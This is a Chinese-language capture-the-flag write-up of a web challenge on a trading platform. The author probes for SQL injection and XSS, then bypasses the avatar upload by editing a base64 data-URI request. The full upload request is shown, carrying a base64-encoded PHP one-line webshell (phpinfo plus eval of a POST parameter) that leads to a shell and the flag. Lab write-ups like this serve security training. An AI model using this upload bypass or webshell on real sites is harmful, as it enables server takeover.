这里直接来到一个交易平台
还是三板斧
源码查看

<script>


$('#searchList li').click(function(){

var type=$(this).attr('aman-type');



$(this).parent().find('li').attr('class','red');

$(this).attr('class','red-on')



search();

});

function search(){

var url='/index';

var type=$("#type .red-on").attr('aman-value');

if(type!=''){

url+='/type/'+type;

}

location.href=url;

}

</script>

在源码中找到一个显露出来的script代码

响应报文查看

这里发现phpsessid，这点要注意

这里就是一个完整的网站架构，现在我们猜测flag的位置

这里有这几个跳转页面，一般来说首页没啥好测的
我们分别点开

二手

求购

公告

登录

注册

按照思路，先进行数据库渗透
公告页面首当其冲
我们查看后，发现规律
这里的页面并不是传参访问

而是直接跳转访问，所以不存在get的sql注入
先尝试下任意文件访问漏洞是否存在

这里出现个没有显示出来的页面
再然后就没有更多了

接下来就是商品页面
发现求购页面是假的，只有二手页面可以点开

发现这里访问页面传参，可以进行sql注入测试

在商品下发现评论，可以进行xss漏洞测试

先进行xss漏洞测试

要登录，先登录
随意注册了个账号，并登录

评论了两下，发现<>被注释

这种就是代表对方xss反渗透做的很好，没必要继续xss测试

接下来进行sql注入测试

这里看到闭合错误，说明这里有sql注入点

好家伙，居然对注释字符进行了过滤，无法闭合，sql注入点不存在

这下面有三个接口

因为求购页面是假的，所以先尝试发布二货

因为这里发布的填写数据，是可以被我们直接访问到的，如果我们在这些信息中包含一句话木马，是否可以利用菜刀或蚁剑连接呢

这里的二货和求购都在审核，相当离谱

相片和昵称都尝试上传一句话木马

这里可以看到，如果头像的一句话木马上传成功，则可以直接访问连接，成功getshell

上传正常图像抓包

但一旦上传非正常图像上去，就会出现加载不出来的情况
因为没有报文发送，应该是卡在前端这个图像编辑器这里
这里在选中非正常图片的报文是这样的

正常图片的报文是这样的

这里会多出一个data报文

这里我们抓取上传报文，将这里的image数据给改了，改为一句话木马

显示上传失败
有可能是没有加密

把数据夹杂进去
提示保存成功

但是这里是jpeg文件，蚁剑只能连接php文件
所以要改后缀

多次提交后发现，不论提交的是什么后缀最后都会改为jpeg后缀
从上面探查到的报文和bp抓下来的报文进行分析

这里看到data这个关键字，即下面的是上面报文加密的状态

下面解密后得到

data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/4gHYSUNDX1BST0ZJTEUAAQEAAAHIAAAAAAQwAABtbnRyUkdCIFhZWiAH4AABAAEAAAAAAABhY3NwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAA9tYAAQAAAADTLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlkZXNjAAAA8AAAACRyWFlaAAABFAAAABRnWFlaAAABKAAAABRiWFlaAAABPAAAABR3dHB0AAABUAAAABRyVFJDAAABZAAAAChnVFJDAAABZAAAAChiVFJDAAABZAAAAChjcHJ0AAABjAAAADxtbHVjAAAAAAAAAAEAAAAMZW5VUwAAAAgAAAAcAHMAUgBHAEJYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAAt4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9YWVogAAAAAAAA9tYAAQAAAADTLXBhcmEAAAAAAAQAAAACZmYAAPKnAAANWQAAE9AAAApbAAAAAAAAAABtbHVjAAAAAAAAAAEAAAAMZW5VUwAAACAAAAAcAEcAbwBvAGcAbABlACAASQBuAGMALgAgADIAMAAxADb/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/2wBDAQMDAwQDBAgEBAgQCwkLEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBD/wAARCAJMAkwDASIAAhEBAxEB/8QAHQAAAQQDAQEAAAAAAAAAAAAABAIDBQYAAQcICf/EAEQQAAEDAwMDAwMDAgUCAwcDBQEAAgMEESEFEjEGQVEHEyIyYXEUgZEIIxUzQlKhYrEWJHIlJkOCksHRCVPhFzSTorL/xAAbAQADAQEBAQEAAAAAAAAAAAAAAgMBBAUGB//EACYRAAICAgICAgMAAwEAAAAAAAABAhEDMRIhBBMFQSIyURQjYTP/2gAMAwEAAhEDEQA/APma27BtLSSURAxkmJS5tuPCLpWt+HuRg4RjqelkbizV6oyGqWnhth6JIjp2kse0m3F0M6OOPDHE/hbgaXPsHtz/ALig0fZWdi4JxsrXEHcL/lBSxubJtD2Z+6UyKTvKz+UAFve6Y7ZbNA4LU25jWA/MkWScswXg/grdwRyEDxG2thlw0ncmnM9qUNZgkgEoiljbSyOkkIIdwtTQipcSHWB7oYxJiCWGlbNBUM3cgbggX1moPeY6mK7TgkDshnsfE1rWVDjtyM4WCerPxJBvi4UboBFVpzJAXxseL/ZC/wCEVTCHQyua4nF/KOfFXOb8Zm/i6dbK+GO09zjlR5WwMh0bXpIQ79XAQObkJQ0utYR+pdGR3LSte/E9mJ5AfASZP1MjbRSusebq0egEz0cAOXtH7pj2YGmzZB/KIjgAFptzifKdFNTXH9m33utAHhhAcD7gwR3Tz3PacOuPslGekpzmNx/Zb/xSh/8A2H/wm5AIEjgb7nG3ladVMF/cx+Ev/FaAfVA+34SH6ro7j84Hj8hScjE7NsqoCLANuUsAPF9rU0KrSn5jieP2T7JqY5abJORrFMDQLtbkcJ9lTMwi1khssRaQCL28pFwFqk26YsN0GtqJHkXATrAJHAXF7oKN5JAva6VG6RkpIN/wnSsdkiYyz/VhE0soa9jb43BBse97B8Xfwi6aEmzi04+yxujCchc22Krb+cI+kZG8k+7uP2N1FRxMfHlrwbeFL6a2CmjD3Ak8pHKhODJXTYhLUhkzi5jscronSL4tJq4p6V0wYGnc33L2PmyomkajRiWzor5Vy03VaSn2ObE43I7KayNCuDPQPS3UFPq9M2Nsp3Mb/qCjepnPqQ+nefgLm/Zc80rqI09n073M3HIarFU68JmRxh197fkSUexsFCRXepNF/U0zPYhuA4XNuyrGr9Ax1NK2Uxi5HhdBOoweyGvYHWN7JP8AiFPLy1m3/bdZzLxxs4Pq/SDKQn3Ynta3w02KrGq6Mwxn9Oy4t4Xo+u0ak1ene722gC+VRq7oxrnSNZGLAnsjmWjjVdnAKqjlheWyNDQBfOFGStG8ldk1voKeUOk/SWwRcDt5XPta6UfpkxD5Bd17A8q3IVqisMaXPIscrbIwZNrxZt0c3SK1jg6xsTzZbk02q/2n+Fidi0FUzIxGBTksI7qUo9Hqa3bepIDjbJUVSR+yNsjvyp6mr4IYmhknHe/ComY0Xbpzo3T2xNkrq8tjxdt8/mys0HSdNVWp9Jq3l1/rfHgD7LnNJ1FThgjfUPuOLG4Uzp/VcbHNbTvb7gIsXOLcouznlGi1aj6P+pmp1kc2jarTNjjALXEtBuOEzBovqf0nvj1ilbXkmwcx/CNj6j1+uoWtErY9owYpDcqa6b6o1GR4odWmmghB/wA6Vu8fn7rBaJn099TqjRvapdR6TnmmeS3aQbEldr6HqqrWdS99uhUNC8kOIqqkRgC/3IXItU0atrmR6j0L1PT1VbCATE1jQ0j8FV9snq9XagR1LO6Gm2lpdBsGB5sbpXKhWrPcvTnq10tourQ9MaxqlLJKQA2Okd7jQ7/1AroUdf8A43UxVz5I3QtYfaYzOO11489HOiOm6a1fXa1BPUOBcXSPu9ruwycL0x0Zq2gQxtjNY2RrLNJYb2St2FEn1LpL6ysZLUu2h7dsYHN+y8Uf1R+hJ1vVKnqal0936qra6KEA2AIHJXt/qTWpzpdTXDTHPp6cf+XlsQXG3byoWh0Gn6lpY9Q1KON1K2I7Q5txucMZTRGTPiJU6ZU6L1BX6VUNfHV0klpGhpNlZdB1Sq0rqvQuoqeo/uwVTSAwXOCLXXS/6s9E6M0v1bq2aE91NUlzjU4sx+cZXO+kOkqrWOr9DpKiYR0ss7GEA2OXi5TREyLo+pXUlPXatomg6rQ0j3VdTpcTne002d8fI4KTMZNd0KKjr6QQ1FMNtnCzv5PKLbr9XotJoTqY2io6COnEbm4e0AAlWrp/puh6sqRqdLqEcMrx84nkAX/C6MZ43kx5HOW6W6KIMYC4DGBhPNoZm7LDaCRzhdD1/wBPoen2OmOpQSOfd1m8XUGKI7RuYCBwV1Rm0efLGkVkwvjk2nJPCl6OlmjYJC211IfoWGcOcwYUiBH7Xt+2ALK3MhKJFUUYIduxnuny0Nw0p39OzcSHAfYrPbCWUyaghEYNxhPXHlY1gtys2WUm7FaFs4SklnCUsMiPQ8hGw/UUHALuaPuEexgAQ1ZeCsXGDt47oqMjbymG8J1n0rKLxVnwvDBtAvYoSQSNk+L3HKS2ebcLk2unWP3Pu7H5UD61Cfck4LkqJzg7Lkt5i5FkkPZcWCDRLonSPuHOH3W/0sx4mKS8yFxLXWSmOqO7h/KANWkjIDnuJOE+1zgDudhJGfqFysPBWN0PEc3tlbYk4W2PDeCUyydjDkYWSVEbrlrgP3WjBTQJOStlhZloOFHfqnj6M/hbFXUXyCosA8TEHhblka9vyI/CAZO9z8ghEWDsuUFsBbaiCPFgE7HqETSBtxdCOhhcbkOwtiOEG9nYVUwJB0rJssstCOTsVGvmlYQYWn9gnI62sJALDn7JwDwy+HhpPdK9uL/9sLKeJzgHvNr+UuRoacG6RsBh8Ud/8oJp1NE43MYsirE9k7HA14uVICPNIzhgskugdGDYqW/SNPC2NOL+SgCIiEhIyeUTsk8o86eGHAWfpD/uH8po7syMWmCxBwcLuHKKh+rK22keTdu0/hPtpZrE2VUPVhEMz4h8Q39yjqWpneQA1pubYUR7M5NgDf8ACmdMEjWWdHc/hTk6NUX9EnAJ3C1gpahja9u2fHiyD0yklqTi4PhWPTNKqHSCN8JcLjtyuWWRPRf1xA44oYCXxXP4Vl0SoMzGxmMk3FjZS+m9HtmLWmktcg3Vl07omeM/2ogPGFNzSNWJPRE09PXlto2tzgfdTNNDqY2tfDgDlWDTuk9VhLXPh3NuOBwrJT9N1L4xeGT91nsR2QwR+yjsie4H3r3+yfpqVxJDWnOMhXMdLVNyfYx/6UtnTlSwgeyLX8I9iKSxRWipxwyU0bqcHLs2TcFM7c4yR3H4Vwl0OQEOMBLidv0lOHQXxx7/AGs/happkJxS0VHVtEnr9PIoWNDtp5bzhcZ6h6NjZqLqite58zXfQOAvRxoJrOaA5pAxjCr2pdGsrJDUGEF/N7cp+cSEo2eddQ0xptHDSnHhqh6vTquMHdSuAOPpK7bq3TEdNVEuisQbgAKI1LSxJHtdG0Y7tsmhkRnFHDq3TJG3fYgdxZChjQ3aCfH4XRtc6bmdE7Yy172wqVLodZTPcH0zhc82Kp7P4RkuyMs5vDrj7ImlaQfcEb3DkgFKmo6iM/KMgfhP0LjEb24zYo9n8OdxbLb09rBjZG2P3Iy1wsHZF/urjput6hqJdDGYqwNwY3t2t/F+651RTMlc11y0gg/FWbRAJZfZfWGFhNyW4KZTsSmtltpNIr9Ll/xSidUUrpD82RyER/jPZdA6d1Oqq6IQTz6Z7hNgZaphN/u2+fwue01KWTgQai+ogDcxl98qc0/SNN1MOgNW+le8bcHi61uxWjsfQvpp0jV6oKyoqIqf3CHSPYQ1rn34GcLvPSHp1SU2qxV1JWthgsGhj34cP9wvyvIfR+nar0tUO0yt1f36aZ4Mc+8kNBPF/K7b0j1W7pMt12rrnahSsjLHMLjZuFhh6k1OOfqGji6d02anhbA27vcIbvH2uhq6Ch6ap5KOrrIoRBTw3jMgBJ2m5AK4zN/Uvpg041I0iCCqa0tYd1iW2/7qn6Z1b1R6s9VU2tPppBp5aRuDztu3z2TxCzmf9YTvQz036mp6vqvpf9bqWpU4fG6SM3L74/5svKHpr1hoehetemdU11C06PT1jXMpCDlpcLY8fde7f6+fSbSOvfRak9RXt9qv0VjCbC5cPcAI/gLwt6TemPUPqv1lpUWl0UkdLTFpdK7AIa4Z+6cTJJNdH081KPSuo6ek1nTqGWnvTxviiIta4uBlI0ilfLXCGXfE8WvdxB/4R+l6XrlDRUtKxvv/AKRkURDGXvZoHZS50KsbWR19RH7IsCQ4W/bKpF0eVmVjc9KHtED3B1v9ziSmxSNa3bfAUjNB/c3gEjbz2TOwcGyspHJNEe6lBPxzZZ7B7kKRjhbci4yskpWjKzmznaIp8Ivwke3bkKRdB8uE2+EXxytUn9iKIDsAWW+yfdH8rWWGMAFMmTlEQ1nxJWBpuMFLj8FOBov2TixiKhZZzT9wjbg8IZifj5QWSofYD4TwBtwkRp0A24QPF0fCH9MRncFhhfY/JPbm/wC4fysPC5m6PrUMsiI+pwH7pRDW8ELT0laaK7JTFpvC1cDusSoB248rRIschN77rLjys4jxNhjHfUQt+zTjOUlYmGFAxAgCPn7Jzaz/AGn+E0DY3SjL90kgFgMFjtKUmnSHaFsvJaGjlcz2A4s5SGNeBkpbeFsdgOsDAMiyUA0/SE2cgBEwtAHKcDe57G2ulxv3D5YSHZP7p6OJxFw0n9lNjUOsYCPyn2NDcAp2igklIa5lhdSsWlMJBcLZ7rAojYo72tlFMiPg/wAKTbp8TRZoF0RS6UXG/KNDxiQ3std9RC3Hpckzi5oNvwp92kPuP7fJ8Kf0Xp90rQ3aCfCn7kNRT6fRpCQC3k5wj4dDbuF3DkLpVH0VJO2zaZxvjDSrJovpaZyGzUhBJ7gqeTO1oKOSw9LRSDcyxJUxovRYllG4tIuL2XfdE9FoHBp/TnkWVypPSugo42t/Ri/c7VyzzzZeMThvTXpxSySglrrEjsui6P6caa2Qf2y51sYXV9B6D0yEf5QFvIVuoei6CJwe1oyOVy+2Q3E5LpvR1KypYwQGwsPpVvoej6YAEQtv2wr/AKf0tRRzEvj74NlPR9M0hZdthZNGbexouigUnT0MDRvgYbfZHt

分别上传两张图片进行比较

data%3Aimage%2Fjpeg%3Bbase64%2C%2F9j%2F4AAQSkZJRgABAQAAAQABAAD%2F4gHYSUNDX1BST0ZJTEUAAQEAAAHIAAAAAAQwAABtbnRyUkdCIFhZWiAH4AABAAEAAAAAAABhY3NwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAA9tYAAQAAAADTLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlkZXNjAAAA8AAAACRyWFlaAAABFAAAABRnWFlaAAABKAAAABRiWFlaAAABPAAAABR3dHB0AAABUAAAABRyVFJDAAABZAAAAChnVFJDAAABZAAAAChiVFJDAAABZAAAAChjcHJ0AAABjAAAADxtbHVjAAAAAAAAAAEAAAAMZW5VUwAAAAgAAAAcAHMAUgBHAEJYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAAt4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9YWVogAAAAAAAA9tYAAQAAAADTLXBhcmEAAAAAAAQAAAACZmYAAPKnAAANWQAAE9AAAApbAAAAAAAAAABtbHVjAAAAAAAAAAEAAAAMZW5VUwAAACAAAAAcAEcAbwBvAGcAbABlACAASQBuAGMALgAgADIAMAAxADb%2F2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD%2F2wBDAQMDAwQDBAgEBAgQCwkLEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBD%2FwAARCAUABQADASIAAhEBAxEB%2F8QAHgAAAQQDAQEBAAAAAAAAAAAAAAECAwQFBwgGCQr%2FxABzEAABAwMCAwQEBg0ECQ0NAREBAAIDBAURBiEHEjEIE0FRFCJhcRUWVYGRoRcYMkJSU1RikpOUsdEJI1aVJDM1V3OywdLhJTZDZGVydHWCs7TT8BkmNDdERUZYY4SWotQnKEdmdoPxOKXDZ3fC4lmFpLX%2FxAAcAQEAAwEBAQEBAAAAAAAAAAAAAQIDBAUGBwj%2FxAA4EQACAgEDAgQFAgQFBAMAAAAAAQIRAwQSIQUxExRBUQYVIjJhM1IHcZGhFiNCU4EkVLHBF9Hw%2F9oADAMBAAIRAxEAPwDAcFtG8ONU6Frw%2BiluF1uXNBqF9zHNWCo%2B%2Ba8ndoB3GF4jVmpeIPBumbwndV1DqW51cMNjvQHNLFSPeGvj5j0kYDsd%2FwDKsBY5eJ%2BkaebtC0139MozUdzfbfHCG9%2FT5A7zbq5ueuMrYPHjXmjLzwsobybm6urbnyVVhgpA104nBBbIM55QD91nbbCA9Aez3dQ0uPHLiPsM%2FwB2HKCl4C3WpLscbuJDQ04yby7deNjpeONRoG16qqeOlXT1Nza3%2BwzZIHd2S7BHPzb49wV7gbX8VL%2FqivqLnxEr7xpy0%2FzDpvQIoW1NVj1mt5QSWt887%2BxAes%2B15u39%2FLiP%2FXDkfa83b%2B%2FlxH%2FrhyqcduIOptOVFo0lpXVPwXXXKOStnrnQMeYaePYhrXbFxJAxsVqV2reLj6cT0%2FHrUstQ5%2FKKdujm8mM%2FjM4QG4NDU2odE8VZeHVTrC76ht9TbfTxLd5u%2FnikBxhr%2Bob7Fm%2B0PBy8HNSHHSmH%2BMFpjW9t1vpXQlx4k3PiRW1OopqH0eKq9FZTzQwl2DGImknfxd4exe50n2aOEN6sNHc7jZK%2BpqaqjiqJZX11Q0vkc0FxI5vEkoD1mroP%2FsDq3Y%2F8wRnp%2FwCzavB3Sx0usJOGWhb66eWyXC1unqaWOZ0Qlexo5SSwgnHvW63aWo7rpmXTlc177UYPRHQBzgXRAYA5geboBvnK8Jp3s%2FaF0VfrfqbSlBU0FYyoELXOqpZQWOB5hhziPBAY5

data%3Aimage%2Fjpeg%3Bbase64%2C%2F9j%2F4AAQSkZJRgABAQAAAQABAAD%2F4gHYSUNDX1BST0ZJTEUAAQEAAAHIAAAAAAQwAABtbnRyUkdCIFhZWiAH4AABAAEAAAAAAABhY3NwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAA9tYAAQAAAADTLQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlkZXNjAAAA8AAAACRyWFlaAAABFAAAABRnWFlaAAABKAAAABRiWFlaAAABPAAAABR3dHB0AAABUAAAABRyVFJDAAABZAAAAChnVFJDAAABZAAAAChiVFJDAAABZAAAAChjcHJ0AAABjAAAADxtbHVjAAAAAAAAAAEAAAAMZW5VUwAAAAgAAAAcAHMAUgBHAEJYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAAt4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9YWVogAAAAAAAA9tYAAQAAAADTLXBhcmEAAAAAAAQAAAACZmYAAPKnAAANWQAAE9AAAApbAAAAAAAAAABtbHVjAAAAAAAAAAEAAAAMZW5VUwAAACAAAAAcAEcAbwBvAGcAbABlACAASQBuAGMALgAgADIAMAAxADb%2F2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD%2F2wBDAQMDAwQDBAgEBAgQCwkLEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBD%2FwAARCAJMAkwDASIAAhEBAxEB%2F8QAHQAAAQQDAQEAAAAAAAAAAAAABAIDBQYAAQcICf%2FEAEQQAAEDAwMDAwMDAgUCAwcDBQEAAgMEESEFEjEGQVEHEyIyYXEUgZEIIxUzQlKhYrEWJHIlJkOCksHRCVPhFzSTorL%2FxAAbAQADAQEBAQEAAAAAAAAAAAAAAgMBBAUGB%2F%2FEACYRAAICAgICAgMAAwEAAAAAAAABAhEDMRIhBBMFQSIyURQjYTP%2F2gAMAwEAAhEDEQA%2FAPma27BtLSSURAxkmJS5tuPCLpWt%2BHuRg4RjqelkbizV6oyGqWnhth6JIjp2kse0m3F0M6OOPDHE%2FhbgaXPsHtz%2FALig0fZWdi4JxsrXEHcL%2FlBSxubJtD2Z%2B6UyKTvKz%2BUAFve6Y7ZbNA4LU25jWA%2FMkWScswXg%2FgrdwRyEDxG2thlw0ncmnM9qUNZgkgEoiljbSyOkkIIdwtTQipcSHWB7oYxJiCWGlbNBUM3cgbggX1moPeY6mK7TgkDshnsfE1rWVDjtyM4WCerPxJBvi4UboBFVpzJAXxseL%2FZC%2FwCEVTCHQyua4nF%2FKOfFXOb8Zm%2Fi6dbK%2BGO09zjlR5WwMh0bXpIQ79XAQObkJQ0utYR%2BpdGR3LSte%2FE9mJ5AfASZP1MjbRSusebq0egEz0cAOXtH7pj2YGmzZB%2FKIjgAFptzifKdFNTXH9m33utAHhhAcD7gwR3Tz3PacOuPslGekpzmNx%2FZb%2FxSh%2F8A2H%2Fwm5AIEjgb7nG3ladVMF%2Fcx%2BEv%2FFaAfVA%2B34SH6ro7j84Hj8hScjE7NsqoCLANuUsAPF9rU0KrSn5jieP2T7JqY5abJORrFMDQLtbkcJ9lTMwi1khssRaQCL28pFwFqk26YsN0GtqJHkXATrAJHAXF7oKN5JAva6VG6RkpIN%2FwnSsdkiYyz%2FVhE0soa9jb43BBse97B8Xfwi6aEmzi04%2ByxujCchc22Krb%2BcI%2BkZG8k%2B7uP2N1FRxMfHlrwbeFL6a2CmjD3Ak8pHKhODJXTYhLUhkzi5jscronSL4tJq4p6V0wYGnc33L2PmyomkajRiWzor5Vy03VaSn2ObE43I7KayNCuDPQPS3UFPq9M2Nsp3M

将jpeg改为php

尝试了半天一定要把原来的图片数据删掉，这样插入的base64一句话木马才有效果

保留有用部分

插入一句话木马

image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgcGhwaW5mbygpO2V2YWwoJF9QT1NUWydjbWQnXSk7Pz4=

成功修改后缀和内容

上传成功

getshell

在当前网站目录下可以看到大量的文件，有一个文件的名称名为flag，打开查看

在这里看到flag